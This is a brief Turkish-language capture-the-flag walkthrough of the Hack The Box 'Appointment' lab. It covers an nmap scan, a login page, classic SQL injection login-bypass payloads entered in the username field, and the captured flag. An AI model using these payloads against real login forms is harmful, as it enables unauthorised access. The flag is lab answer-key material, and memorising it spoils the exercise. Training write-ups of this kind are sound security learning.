121 kelime
1 dakika
Appointment
Makine Bilgileri
- Platform:
HTB- Lab:
Starting Point- Zorluk Derecesi: Çok Kolay
- OS:
Linux- IP:
10.129.11.227
Adım 0: Başlangıç
mkdir -p HTB/LAB/APPOINTMENT && cd HTB/LAB/APPOINTMENTIP=10.129.11.227 && ping -c 2 $IPBu komutları anlamıyorsan, ilk raporlara göz at.
Adım 1: Keşif
Nmap Taraması
nmap -sC -sV $IP
Bulgular
Açık port>>80/tcp (HTTP)
Tarayıcıda aç >> http://$IP/
Basit bir giriş formu var.
Adım 2: Çözüm -> SQLi
Aşağıdaki payloadu username alanına yaz:
admin' OR '1'='1'-- -
- Alternatif:
' OR 1=1-- -
SQLiSorgu düzgün sanitize edilmediğinde, kimlik doğrulama koşulu her zaman doğru olur ve giriş bypass edilir.
Capture the Flag
e3d0796d002a446c0e622226f42e9672Şimdi kendine şu soruları sor:
- Bir giriş sayfasında SQL açığı olduğunu nasıl anlarsın?
- Bu komutları tek tek yazmak zorunda mıyız? Kolay yolu ne?
Tamamdır!
Şimdilik başka bir şey yok.
Appointment
https://www.hackthebox.com/ Bazı bilgiler güncel olmayabilir